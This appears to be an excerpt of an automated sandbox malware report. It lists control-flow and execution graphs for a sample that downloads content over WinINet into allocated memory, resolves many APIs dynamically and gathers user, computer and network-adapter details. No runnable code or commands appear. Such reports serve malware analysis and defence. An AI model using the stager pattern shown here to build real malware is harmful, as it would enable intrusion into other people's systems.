                                                                      control_flow_graph 134 112cf4c03b2-112cf4c03e4 InternetConnectA call 112cf4c044e 137 112cf4c044e-112cf4c0455 134->137 138 112cf4c03e6 134->138 139 112cf4c0456-112cf4c046d HttpOpenRequestA 137->139 140 112cf4c041f 138->140 141 112cf4c03e8-112cf4c03f9 138->141 143 112cf4c046f-112cf4c0470 139->143 140->139 142 112cf4c0421-112cf4c0423 140->142 145 112cf4c044b-112cf4c044d 141->145 146 112cf4c03fb-112cf4c0404 141->146 147 112cf4c049f-112cf4c04af 142->147 148 112cf4c0425-112cf4c0431 142->148 149 112cf4c0472-112cf4c0474 143->149 145->137 146->145 153 112cf4c0406-112cf4c0415 146->153 157 112cf4c04d0-112cf4c04ed 147->157 158 112cf4c04b1 147->158 154 112cf4c049a-112cf4c049d 148->154 155 112cf4c0433-112cf4c0435 148->155 152 112cf4c0475-112cf4c0499 149->152 152->154 153->143 159 112cf4c0417-112cf4c0418 153->159 154->147 155->158 160 112cf4c0437-112cf4c0442 155->160 168 112cf4c04ef-112cf4c0535 VirtualAlloc InternetReadFile 157->168 169 112cf4c04cb call 112cf4c053d 157->169 162 112cf4c04b2-112cf4c04c7 158->162 159->149 163 112cf4c041a-112cf4c041e 159->163 160->162 164 112cf4c0444-112cf4c044a 160->164 162->169 170 112cf4c04c9 162->170 163->140 164->145 168->169 172 112cf4c053b-112cf4c053c 168->172 169->157 170->152
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$AllocConnectFileHttpOpenReadRequestVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 258568742-4213443877
                                                                      • Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction ID: fabdbe3095bc90eef468ee72f3158c548ed07a7cc009858f2d8068212d199f37
                                                                      • Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction Fuzzy Hash: 5141D47020DF882EF72E42285C55FBFABA8E752716F41529BE745CA0E3D8144C9482BA

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetLibraryLoadOpen
                                                                      • String ID: wini
                                                                      • API String ID: 2559873147-1606035523
                                                                      • Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction ID: 0086e64d7b7f9af29c23a186704a7c4da466b999390eea5688f14ea2db7d47a0
                                                                      • Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction Fuzzy Hash: 0BF027A010EA8C2FD32949745C4A9777B99D712205306425FE185C21B2C9100C408266

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFiberEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000112CF6B2904), ref: 00000112CF6C1F66
                                                                      • DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000112CF6B2904), ref: 00000112CF6C1F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Fiber$CreateDelete
                                                                      • String ID:
                                                                      • API String ID: 2527733159-0
                                                                      • Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction ID: 3459f722935aeb7bc90b269abf34a7258c639d1664d5d4544a9e36d74c47906d
                                                                      • Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction Fuzzy Hash: 6E314F30214E458FE798EF38C448BEAB7E1FB98311F6545A9E6A9C3291DB34D451CB42

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 198 112cf6bd510-112cf6bd53e 199 112cf6bd540-112cf6bd544 198->199 200 112cf6bd546-112cf6bd548 198->200 199->200 201 112cf6bd54d-112cf6bd583 199->201 202 112cf6bd63a-112cf6bd64a 200->202 203 112cf6bd585-112cf6bd589 201->203 203->200 204 112cf6bd58b-112cf6bd5ac call 112cf6bb450 203->204 207 112cf6bd632-112cf6bd635 204->207 208 112cf6bd5b2-112cf6bd5cf 204->208 207->203 209 112cf6bd5d1-112cf6bd5d6 208->209 210 112cf6bd5d8-112cf6bd5e5 208->210 209->202 210->209 211 112cf6bd5e7-112cf6bd611 call 112cf6c2ab0 210->211 211->200 214 112cf6bd617-112cf6bd62b LdrGetProcedureAddress 211->214 214->209 215 112cf6bd62d 214->215 215->200
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProcedure
                                                                      • String ID:
                                                                      • API String ID: 3653107232-0
                                                                      • Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction ID: 61ae68e20ebb0f10324a01a40013e34f5993e809b80dd3f12a3bd4b9be1e3b4a
                                                                      • Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction Fuzzy Hash: A541073111CA044FE758DB28DC85FEA73E0FB84314F64046DEA9AC7251EA30E8528BC7

                                                                      Execution Graph

                                                                      Execution Coverage:6.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:733
                                                                      Total number of Limit Nodes:46
                                                                      execution_graph 6367 184be2a026e 6368 184be2a028f 6367->6368 6370 184be2a029a 6368->6370 6371 184be2a0366 6368->6371 6372 184be2a0375 LoadLibraryA InternetOpenA 6371->6372 6373 184be2a03b2 7 API calls 6372->6373 6374 184be2a03a3 6373->6374 6056 184be569d1b 6057 184be569d38 6056->6057 6082 184be573830 6057->6082 6062 184be574310 NtAddBootEntry 6063 184be56a468 6062->6063 6064 184be574310 NtAddBootEntry 6063->6064 6067 184be56a5fa 6063->6067 6065 184be56a49c 6064->6065 6066 184be574310 NtAddBootEntry 6065->6066 6065->6067 6068 184be56a4d0 6066->6068 6072 184be56a777 6067->6072 6086 184be5748a0 6067->6086 6068->6067 6069 184be574310 NtAddBootEntry 6068->6069 6071 184be56a4ff 6069->6071 6071->6067 6073 184be574310 NtAddBootEntry 6071->6073 6074 184be56a535 6073->6074 6074->6067 6075 184be574310 NtAddBootEntry 6074->6075 6076 184be56a566 6075->6076 6076->6067 6077 184be574310 NtAddBootEntry 6076->6077 6078 184be56a595 6077->6078 6078->6067 6079 184be574310 NtAddBootEntry 6078->6079 6080 184be56a5c6 6079->6080 6080->6067 6081 184be574310 NtAddBootEntry 6080->6081 6081->6067 6083 184be569f39 6082->6083 6084 184be573876 6082->6084 6083->6067 6090 184be574310 6083->6090 6084->6083 6085 184be5738e9 NtAddBootEntry 6084->6085 6085->6083 6087 184be57490f 6086->6087 6088 184be5748ce 6086->6088 6087->6072 6088->6087 6089 184be57490d NtAddBootEntry 6088->6089 6089->6087 6091 184be574347 6090->6091 6092 184be56a439 6090->6092 6091->6092 6093 184be5743a1 NtAddBootEntry 6091->6093 6092->6062 6092->6067 6093->6092 6375 184be2a016d 6377 184be2a01e9 6375->6377 6376 184be2a0366 9 API calls 6378 184be2a029a 6376->6378 6377->6376 6378->6378 6094 184be2a0366 6095 184be2a0375 LoadLibraryA InternetOpenA 6094->6095 6098 184be2a03b2 InternetConnectA 6095->6098 6105 184be2a044e 6098->6105 6100 184be2a0460 HttpOpenRequestA 6103 184be2a046f 6100->6103 6102 184be2a04ef VirtualAlloc InternetReadFile 6102->6103 6104 184be2a03a3 6102->6104 6103->6102 6106 184be2a0456 HttpOpenRequestA 6105->6106 6109 184be2a046f 6106->6109 6108 184be2a04ef VirtualAlloc InternetReadFile 6108->6109 6110 184be2a03d6 6108->6110 6109->6108 6110->6100 6110->6103 6213 184be56d060 6214 184be56d10b 6213->6214 6216 184be56d1be 6214->6216 6217 184be56ab40 6214->6217 6218 184be56ab9f 6217->6218 6220 184be56ab74 6217->6220 6218->6220 6221 184be569660 6218->6221 6220->6216 6222 184be56969c 6221->6222 6223 184be572df0 NtAddBootEntry 6222->6223 6224 184be569794 6222->6224 6223->6224 6224->6220 6379 184be560a20 6381 184be560a50 6379->6381 6380 184be560b7c 6381->6380 6382 184be5736f0 NtAddBootEntry 6381->6382 6382->6380 6571 184be5685a0 6572 184be5685a8 6571->6572 6573 184be5685be 6571->6573 6576 184be567d20 6572->6576 6583 184be566a90 6576->6583 6578 184be567d4d 6579 184be567d70 6 API calls 6578->6579 6580 184be567d5e 6579->6580 6827 184be5682a0 6580->6827 6584 184be566ae6 6583->6584 6585 184be56d510 LdrGetProcedureAddress 6584->6585 6734 184be567be2 6584->6734 6586 184be566b13 6585->6586 6587 184be56d510 LdrGetProcedureAddress 6586->6587 6588 184be566b32 6587->6588 6589 184be56d510 LdrGetProcedureAddress 6588->6589 6590 184be566b51 6589->6590 6591 184be56d510 LdrGetProcedureAddress 6590->6591 6592 184be566b70 6591->6592 6593 184be56d510 LdrGetProcedureAddress 6592->6593 6594 184be566b8f 6593->6594 6595 184be56d510 LdrGetProcedureAddress 6594->6595 6596 184be566bae 6595->6596 6597 184be56d510 LdrGetProcedureAddress 6596->6597 6598 184be566bcd 6597->6598 6599 184be56d510 LdrGetProcedureAddress 6598->6599 6600 184be566bec 6599->6600 6601 184be56d510 LdrGetProcedureAddress 6600->6601 6602 184be566c0b 6601->6602 6603 184be56d510 LdrGetProcedureAddress 6602->6603 6604 184be566c2a 6603->6604 6605 184be56d510 LdrGetProcedureAddress 6604->6605 6606 184be566c49 6605->6606 6607 184be56d510 LdrGetProcedureAddress 6606->6607 6608 184be566c68 6607->6608 6609 184be56d510 LdrGetProcedureAddress 6608->6609 6610 184be566c87 6609->6610 6611 184be56d510 LdrGetProcedureAddress 6610->6611 6612 184be566ca6 6611->6612 6613 184be56d510 LdrGetProcedureAddress 6612->6613 6614 184be566cc5 6613->6614 6615 184be56d510 LdrGetProcedureAddress 6614->6615 6616 184be566ce4 6615->6616 6617 184be56d510 LdrGetProcedureAddress 6616->6617 6618 184be566d03 6617->6618 6619 184be56d510 LdrGetProcedureAddress 6618->6619 6620 184be566d22 6619->6620 6621 184be56d510 LdrGetProcedureAddress 6620->6621 6622 184be566d41 6621->6622 6623 184be56d510 LdrGetProcedureAddress 6622->6623 6624 184be566d60 6623->6624 6625 184be56d510 LdrGetProcedureAddress 6624->6625 6626 184be566d7f 6625->6626 6627 184be56d510 LdrGetProcedureAddress 6626->6627 6628 184be566d9e 6627->6628 6629 184be56d510 LdrGetProcedureAddress 6628->6629 6630 184be566dbd 6629->6630 6631 184be56d510 LdrGetProcedureAddress 6630->6631 6632 184be566ddc 6631->6632 6633 184be56d510 LdrGetProcedureAddress 6632->6633 6634 184be566dfb 6633->6634 6635 184be56d510 LdrGetProcedureAddress 6634->6635 6636 184be566e1a 6635->6636 6637 184be56d510 LdrGetProcedureAddress 6636->6637 6638 184be566e39 6637->6638 6639 184be56d510 LdrGetProcedureAddress 6638->6639 6640 184be566e58 6639->6640 6641 184be56d510 LdrGetProcedureAddress 6640->6641 6642 184be566e77 6641->6642 6643 184be56d510 LdrGetProcedureAddress 6642->6643 6644 184be566e96 6643->6644 6645 184be56d510 LdrGetProcedureAddress 6644->6645 6646 184be566eb5 6645->6646 6647 184be56d510 LdrGetProcedureAddress 6646->6647 6648 184be566ed4 6647->6648 6649 184be56d510 LdrGetProcedureAddress 6648->6649 6650 184be566ef3 6649->6650 6651 184be56d510 LdrGetProcedureAddress 6650->6651 6652 184be566f12 6651->6652 6653 184be56d510 LdrGetProcedureAddress 6652->6653 6654 184be566f31 6653->6654 6655 184be56d510 LdrGetProcedureAddress 6654->6655 6656 184be566f50 6655->6656 6657 184be56d510 LdrGetProcedureAddress 6656->6657 6658 184be566f6f 6657->6658 6659 184be56d510 LdrGetProcedureAddress 6658->6659 6660 184be566f8e 6659->6660 6661 184be56d510 LdrGetProcedureAddress 6660->6661 6662 184be566fad 6661->6662 6663 184be56d510 LdrGetProcedureAddress 6662->6663 6664 184be566fcc 6663->6664 6665 184be56d510 LdrGetProcedureAddress 6664->6665 6666 184be566feb 6665->6666 6667 184be56d510 LdrGetProcedureAddress 6666->6667 6668 184be56700a 6667->6668 6669 184be56d510 LdrGetProcedureAddress 6668->6669 6670 184be567029 6669->6670 6671 184be56d510 LdrGetProcedureAddress 6670->6671 6672 184be567048 6671->6672 6673 184be56d510 LdrGetProcedureAddress 6672->6673 6674 184be567067 6673->6674 6675 184be56d510 LdrGetProcedureAddress 6674->6675 6676 184be567086 6675->6676 6677 184be56d510 LdrGetProcedureAddress 6676->6677 6678 184be5670a5 6677->6678 6679 184be56d510 LdrGetProcedureAddress 6678->6679 6680 184be5670c4 6679->6680 6681 184be56d510 LdrGetProcedureAddress 6680->6681 6682 184be5670e3 6681->6682 6683 184be56d510 LdrGetProcedureAddress 6682->6683 6684 184be567102 6683->6684 6685 184be56d510 LdrGetProcedureAddress 6684->6685 6686 184be567121 6685->6686 6687 184be56d510 LdrGetProcedureAddress 6686->6687 6688 184be567140 6687->6688 6689 184be56d510 LdrGetProcedureAddress 6688->6689 6690 184be56715f 6689->6690 6691 184be56d510 LdrGetProcedureAddress 6690->6691 6692 184be56717e 6691->6692 6693 184be56d510 LdrGetProcedureAddress 6692->6693 6694 184be56719d 6693->6694 6695 184be56d510 LdrGetProcedureAddress 6694->6695 6696 184be5671bc 6695->6696 6697 184be56d510 LdrGetProcedureAddress 6696->6697 6698 184be5671db 6697->6698 6699 184be56d510 LdrGetProcedureAddress 6698->6699 6700 184be5671fa 6699->6700 6701 184be56d510 LdrGetProcedureAddress 6700->6701 6715 184be567a84 6700->6715 6702 184be567321 6701->6702 6703 184be56d510 LdrGetProcedureAddress 6702->6703 6704 184be567340 6703->6704 6705 184be56d510 LdrGetProcedureAddress 6704->6705 6706 184be56735f 6705->6706 6707 184be56d510 LdrGetProcedureAddress 6706->6707 6708 184be56737e 6707->6708 6709 184be56d510 LdrGetProcedureAddress 6708->6709 6710 184be56739d 6709->6710 6711 184be56d510 LdrGetProcedureAddress 6710->6711 6712 184be5673bc 6711->6712 6713 184be56d510 LdrGetProcedureAddress 6712->6713 6714 184be5673db 6713->6714 6716 184be56d510 LdrGetProcedureAddress 6714->6716 6715->6734 6832 184be561160 6715->6832 6718 184be5673fa 6716->6718 6719 184be56d510 LdrGetProcedureAddress 6718->6719 6720 184be567419 6719->6720 6721 184be56d510 LdrGetProcedureAddress 6720->6721 6722 184be567438 6721->6722 6723 184be56d510 LdrGetProcedureAddress 6722->6723 6724 184be567457 6723->6724 6725 184be56d510 LdrGetProcedureAddress 6724->6725 6726 184be567476 6725->6726 6727 184be56d510 LdrGetProcedureAddress 6726->6727 6728 184be567495 6727->6728 6729 184be56d510 LdrGetProcedureAddress 6728->6729 6730 184be5674b4 6729->6730 6731 184be56d510 LdrGetProcedureAddress 6730->6731 6732 184be5674d3 6731->6732 6733 184be56d510 LdrGetProcedureAddress 6732->6733 6735 184be5674f2 6733->6735 6734->6578 6736 184be56d510 LdrGetProcedureAddress 6735->6736 6737 184be567511 6736->6737 6738 184be56d510 LdrGetProcedureAddress 6737->6738 6739 184be567530 6738->6739 6740 184be56d510 LdrGetProcedureAddress 6739->6740 6741 184be56754f 6740->6741 6742 184be56d510 LdrGetProcedureAddress 6741->6742 6743 184be56756e 6742->6743 6744 184be56d510 LdrGetProcedureAddress 6743->6744 6745 184be56758d 6744->6745 6746 184be56d510 LdrGetProcedureAddress 6745->6746 6747 184be5675ac 6746->6747 6748 184be56d510 LdrGetProcedureAddress 6747->6748 6749 184be5675cb 6748->6749 6750 184be56d510 LdrGetProcedureAddress 6749->6750 6751 184be5675ea 6750->6751 6752 184be56d510 LdrGetProcedureAddress 6751->6752 6753 184be567609 6752->6753 6754 184be56d510 LdrGetProcedureAddress 6753->6754 6755 184be567628 6754->6755 6756 184be56d510 LdrGetProcedureAddress 6755->6756 6757 184be567647 6756->6757 6758 184be56d510 LdrGetProcedureAddress 6757->6758 6759 184be567666 6758->6759 6760 184be56d510 LdrGetProcedureAddress 6759->6760 6761 184be567685 6760->6761 6762 184be56d510 LdrGetProcedureAddress 6761->6762 6763 184be5676a4 6762->6763 6764 184be56d510 LdrGetProcedureAddress 6763->6764 6765 184be5676c3 6764->6765 6766 184be56d510 LdrGetProcedureAddress 6765->6766 6767 184be5676e2 6766->6767 6768 184be56d510 LdrGetProcedureAddress 6767->6768 6769 184be567701 6768->6769 6770 184be56d510 LdrGetProcedureAddress 6769->6770 6771 184be567720 6770->6771 6772 184be56d510 LdrGetProcedureAddress 6771->6772 6773 184be56773f 6772->6773 6774 184be56d510 LdrGetProcedureAddress 6773->6774 6775 184be56775e 6774->6775 6776 184be56d510 LdrGetProcedureAddress 6775->6776 6777 184be56777d 6776->6777 6778 184be56d510 LdrGetProcedureAddress 6777->6778 6779 184be56779c 6778->6779 6780 184be56d510 LdrGetProcedureAddress 6779->6780 6781 184be5677bb 6780->6781 6782 184be56d510 LdrGetProcedureAddress 6781->6782 6783 184be5677da 6782->6783 6784 184be56d510 LdrGetProcedureAddress 6783->6784 6785 184be5677f9 6784->6785 6786 184be56d510 LdrGetProcedureAddress 6785->6786 6787 184be567818 6786->6787 6788 184be56d510 LdrGetProcedureAddress 6787->6788 6789 184be567837 6788->6789 6790 184be56d510 LdrGetProcedureAddress 6789->6790 6791 184be567856 6790->6791 6792 184be56d510 LdrGetProcedureAddress 6791->6792 6793 184be567875 6792->6793 6794 184be56d510 LdrGetProcedureAddress 6793->6794 6795 184be567894 6794->6795 6796 184be56d510 LdrGetProcedureAddress 6795->6796 6797 184be5678b3 6796->6797 6798 184be56d510 LdrGetProcedureAddress 6797->6798 6799 184be5678d2 6798->6799 6800 184be56d510 LdrGetProcedureAddress 6799->6800 6801 184be5678f1 6800->6801 6802 184be56d510 LdrGetProcedureAddress 6801->6802 6803 184be567910 6802->6803 6804 184be56d510 LdrGetProcedureAddress 6803->6804 6805 184be56792f 6804->6805 6806 184be56d510 LdrGetProcedureAddress 6805->6806 6807 184be56794e 6806->6807 6808 184be56d510 LdrGetProcedureAddress 6807->6808 6809 184be56796d 6808->6809 6810 184be56d510 LdrGetProcedureAddress 6809->6810 6811 184be56798c 6810->6811 6812 184be56d510 LdrGetProcedureAddress 6811->6812 6813 184be5679ab 6812->6813 6814 184be56d510 LdrGetProcedureAddress 6813->6814 6815 184be5679ca 6814->6815 6816 184be56d510 LdrGetProcedureAddress 6815->6816 6817 184be5679e9 6816->6817 6818 184be56d510 LdrGetProcedureAddress 6817->6818 6819 184be567a08 6818->6819 6820 184be56d510 LdrGetProcedureAddress 6819->6820 6821 184be567a27 6820->6821 6822 184be56d510 LdrGetProcedureAddress 6821->6822 6823 184be567a46 6822->6823 6824 184be56d510 LdrGetProcedureAddress 6823->6824 6825 184be567a65 6824->6825 6826 184be56d510 LdrGetProcedureAddress 6825->6826 6826->6715 6831 184be5682a4 6827->6831 6835 184be562890 6831->6835 6841 184be576970 6831->6841 6844 184be571ed0 6831->6844 6833 184be573ef0 NtAddBootEntry 6832->6833 6834 184be56118f 6833->6834 6834->6734 6840 184be5628f2 6835->6840 6836 184be562a35 6836->6831 6837 184be571ed0 3 API calls 6837->6840 6838 184be56e9a0 NtAddBootEntry 6838->6840 6839 184be562a60 NtAddBootEntry 6839->6840 6840->6836 6840->6837 6840->6838 6840->6839 6853 184be56ebb0 6841->6853 6843 184be5769a9 6843->6831 6846 184be571edc 6844->6846 6845 184be571f94 6845->6831 6846->6845 6847 184be571f0a 6846->6847 6848 184be571f17 6846->6848 6847->6845 6849 184be574eb0 NtAddBootEntry 6847->6849 6848->6845 6850 184be571f4d CreateFiberEx 6848->6850 6849->6845 6850->6845 6851 184be571f79 DeleteFiber 6850->6851 6851->6845 6855 184be56ebde 6853->6855 6856 184be56ec74 6853->6856 6854 184be576a20 NtAddBootEntry 6854->6856 6855->6854 6855->6856 6856->6843 6140 184be576a20 6143 184be56b740 6140->6143 6142 184be576a5e 6150 184be575dc0 6143->6150 6147 184be575dc0 NtAddBootEntry 6148 184be56bd59 6147->6148 6148->6142 6149 184be56b7db 6149->6147 6151 184be575dda 6150->6151 6153 184be56b7c3 6150->6153 6151->6153 6162 184be572df0 6151->6162 6153->6149 6154 184be562a60 6153->6154 6155 184be562aec 6154->6155 6157 184be562b27 6154->6157 6165 184be56e9a0 6155->6165 6158 184be575dc0 NtAddBootEntry 6157->6158 6159 184be562c51 6158->6159 6169 184be575bb0 6159->6169 6163 184be574050 NtAddBootEntry 6162->6163 6164 184be572e50 6163->6164 6164->6153 6166 184be56e9e5 6165->6166 6174 184be576a20 6166->6174 6168 184be56ea85 6168->6157 6170 184be575dc0 NtAddBootEntry 6169->6170 6171 184be575bd1 6170->6171 6172 184be562c56 6171->6172 6177 184be576110 6171->6177 6172->6149 6175 184be56b740 NtAddBootEntry 6174->6175 6176 184be576a5e 6175->6176 6176->6168 6179 184be57611e 6177->6179 6178 184be576171 6178->6171 6179->6178 6180 184be576151 6179->6180 6182 184be57631b 6179->6182 6180->6178 6181 184be575dc0 NtAddBootEntry 6180->6181 6181->6178 6182->6178 6183 184be575dc0 NtAddBootEntry 6182->6183 6183->6178 6184 184be56d510 6185 184be56d540 6184->6185 6186 184be56d546 6184->6186 6185->6186 6187 184be56d617 LdrGetProcedureAddress 6185->6187 6187->6186 6192 184be571ed0 6194 184be571edc 6192->6194 6193 184be571f94 6194->6193 6195 184be571f0a 6194->6195 6196 184be571f17 6194->6196 6195->6193 6201 184be574eb0 6195->6201 6196->6193 6198 184be571f4d CreateFiberEx 6196->6198 6198->6193 6199 184be571f79 DeleteFiber 6198->6199 6199->6193 6202 184be574ecd 6201->6202 6203 184be573830 NtAddBootEntry 6202->6203 6204 184be5750dd 6202->6204 6203->6204 6204->6193 6383 184be570610 6384 184be570643 6383->6384 6385 184be570a1f 6384->6385 6386 184be56d510 LdrGetProcedureAddress 6384->6386 6387 184be57072b 6386->6387 6388 184be56d510 LdrGetProcedureAddress 6387->6388 6389 184be570746 6388->6389 6390 184be56d510 LdrGetProcedureAddress 6389->6390 6391 184be570761 6390->6391 6392 184be56d510 LdrGetProcedureAddress 6391->6392 6393 184be57077c 6392->6393 6394 184be56d510 LdrGetProcedureAddress 6393->6394 6395 184be570797 6394->6395 6396 184be56d510 LdrGetProcedureAddress 6395->6396 6397 184be5707b2 6396->6397 6398 184be56d510 LdrGetProcedureAddress 6397->6398 6399 184be5707cd 6398->6399 6400 184be56d510 LdrGetProcedureAddress 6399->6400 6401 184be5707e8 6400->6401 6402 184be56d510 LdrGetProcedureAddress 6401->6402 6403 184be570803 6402->6403 6404 184be56d510 LdrGetProcedureAddress 6403->6404 6405 184be57081e 6404->6405 6406 184be56d510 LdrGetProcedureAddress 6405->6406 6407 184be570839 6406->6407 6408 184be56d510 LdrGetProcedureAddress 6407->6408 6409 184be570854 6408->6409 6410 184be56d510 LdrGetProcedureAddress 6409->6410 6411 184be57086f 6410->6411 6412 184be56d510 LdrGetProcedureAddress 6411->6412 6413 184be57088a 6412->6413 6414 184be56d510 LdrGetProcedureAddress 6413->6414 6415 184be5708a5 6414->6415 6416 184be56d510 LdrGetProcedureAddress 6415->6416 6417 184be5708c0 6416->6417 6418 184be56d510 LdrGetProcedureAddress 6417->6418 6419 184be5708db 6418->6419 6420 184be56d510 LdrGetProcedureAddress 6419->6420 6421 184be5708f6 6420->6421 6422 184be56d510 LdrGetProcedureAddress 6421->6422 6423 184be570911 6422->6423 6424 184be56d510 LdrGetProcedureAddress 6423->6424 6425 184be57092c 6424->6425 6426 184be56d510 LdrGetProcedureAddress 6425->6426 6427 184be570947 6426->6427 6428 184be56d510 LdrGetProcedureAddress 6427->6428 6429 184be570962 6428->6429 6430 184be56d510 LdrGetProcedureAddress 6429->6430 6431 184be57097d 6430->6431 6432 184be56d510 LdrGetProcedureAddress 6431->6432 6433 184be570998 6432->6433 6434 184be56d510 LdrGetProcedureAddress 6433->6434 6435 184be5709b3 6434->6435 6436 184be56d510 LdrGetProcedureAddress 6435->6436 6437 184be5709ce 6436->6437 6438 184be56d510 LdrGetProcedureAddress 6437->6438 6439 184be5709e9 6438->6439 6440 184be56d510 LdrGetProcedureAddress 6439->6440 6441 184be570a04 6440->6441 6442 184be56d510 LdrGetProcedureAddress 6441->6442 6442->6385 6225 184be565174 6228 184be565179 6225->6228 6229 184be56534b 6228->6229 6230 184be575ee0 6228->6230 6236 184be56fa90 6228->6236 6231 184be575f19 6230->6231 6235 184be575f73 6230->6235 6232 184be574050 NtAddBootEntry 6231->6232 6231->6235 6233 184be575f45 6232->6233 6234 184be574050 NtAddBootEntry 6233->6234 6233->6235 6234->6235 6235->6228 6237 184be56faa6 6236->6237 6239 184be56faa2 6236->6239 6237->6239 6240 184be573ef0 6237->6240 6239->6228 6241 184be573f81 6240->6241 6242 184be573f27 6240->6242 6241->6239 6242->6241 6243 184be573f7f NtAddBootEntry 6242->6243 6243->6241 6244 184be561f80 6245 184be561f93 6244->6245 6247 184be561fb5 6244->6247 6245->6247 6248 184be561730 6245->6248 6251 184be561756 6248->6251 6250 184be5618f8 6250->6247 6252 184be5612b0 6251->6252 6253 184be5612d1 6252->6253 6255 184be561336 6252->6255 6253->6255 6256 184be5739e0 6253->6256 6255->6250 6257 184be573a65 6256->6257 6258 184be573a0e 6256->6258 6257->6255 6258->6257 6259 184be573a63 NtAddBootEntry 6258->6259 6259->6257 6260 184be56c180 6261 184be56c189 6260->6261 6262 184be56c18e 6261->6262 6264 184be56c1c0 6261->6264 6265 184be56c1d5 6264->6265 6267 184be56c1cd 6264->6267 6266 184be572df0 NtAddBootEntry 6265->6266 6265->6267 6266->6267 6267->6262 6268 184be562080 6269 184be562253 6268->6269 6270 184be5620af 6268->6270 6274 184be568c20 6270->6274 6272 184be562228 6272->6269 6280 184be568820 6272->6280 6275 184be568c88 6274->6275 6278 184be568cef 6274->6278 6275->6278 6284 184be5611f0 6275->6284 6277 184be568da0 6277->6278 6287 184be570a40 6277->6287 6278->6272 6281 184be568836 6280->6281 6282 184be5748a0 NtAddBootEntry 6281->6282 6283 184be568bab 6281->6283 6282->6283 6283->6269 6291 184be570e40 6284->6291 6288 184be570a64 6287->6288 6289 184be570b10 6288->6289 6290 184be56d510 LdrGetProcedureAddress 6288->6290 6289->6278 6290->6289 6292 184be561212 6291->6292 6293 184be570e78 6291->6293 6292->6277 6293->6292 6295 184be56d510 6293->6295 6296 184be56d540 6295->6296 6297 184be56d546 6295->6297 6296->6297 6298 184be56d617 LdrGetProcedureAddress 6296->6298 6297->6292 6298->6297 6519 184be562400 6520 184be56240e 6519->6520 6523 184be567d70 6520->6523 6522 184be56241f 6528 184be567da1 6523->6528 6524 184be567f52 GetUserNameA 6532 184be567f70 6524->6532 6525 184be567ff3 GetComputerNameExA 6526 184be568016 6525->6526 6527 184be56805b 6525->6527 6526->6527 6531 184be568034 GetComputerNameExA 6526->6531 6529 184be56809e GetAdaptersInfo 6527->6529 6528->6524 6530 184be5680bc 6529->6530 6534 184be5680f1 6529->6534 6533 184be5680da GetAdaptersInfo 6530->6533 6530->6534 6531->6527 6532->6525 6533->6534 6535 184be560cc0 NtAddBootEntry 6534->6535 6536 184be5681ae 6535->6536 6536->6522 6299 184be570f80 6300 184be570fb3 6299->6300 6301 184be571096 6300->6301 6302 184be56d510 LdrGetProcedureAddress 6300->6302 6303 184be57107b 6302->6303 6304 184be56d510 LdrGetProcedureAddress 6303->6304 6304->6301 6305 184be571780 6306 184be5717b3 6305->6306 6307 184be5718cc 6306->6307 6308 184be56d510 LdrGetProcedureAddress 6306->6308 6309 184be57187b 6308->6309 6310 184be56d510 LdrGetProcedureAddress 6309->6310 6311 184be571896 6310->6311 6312 184be56d510 LdrGetProcedureAddress 6311->6312 6313 184be5718b1 6312->6313 6314 184be56d510 LdrGetProcedureAddress 6313->6314 6314->6307 6443 184be571b40 6444 184be571b73 6443->6444 6445 184be571d9e 6444->6445 6446 184be56d510 LdrGetProcedureAddress 6444->6446 6447 184be571c3f 6446->6447 6448 184be56d510 LdrGetProcedureAddress 6447->6448 6449 184be571c5a 6448->6449 6450 184be56d510 LdrGetProcedureAddress 6449->6450 6451 184be571c75 6450->6451 6452 184be56d510 LdrGetProcedureAddress 6451->6452 6453 184be571c90 6452->6453 6454 184be56d510 LdrGetProcedureAddress 6453->6454 6455 184be571cab 6454->6455 